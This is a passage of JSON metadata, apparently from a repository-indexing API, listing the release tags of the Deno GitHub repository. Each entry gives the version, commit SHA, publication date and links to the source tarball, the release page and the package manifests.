ependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://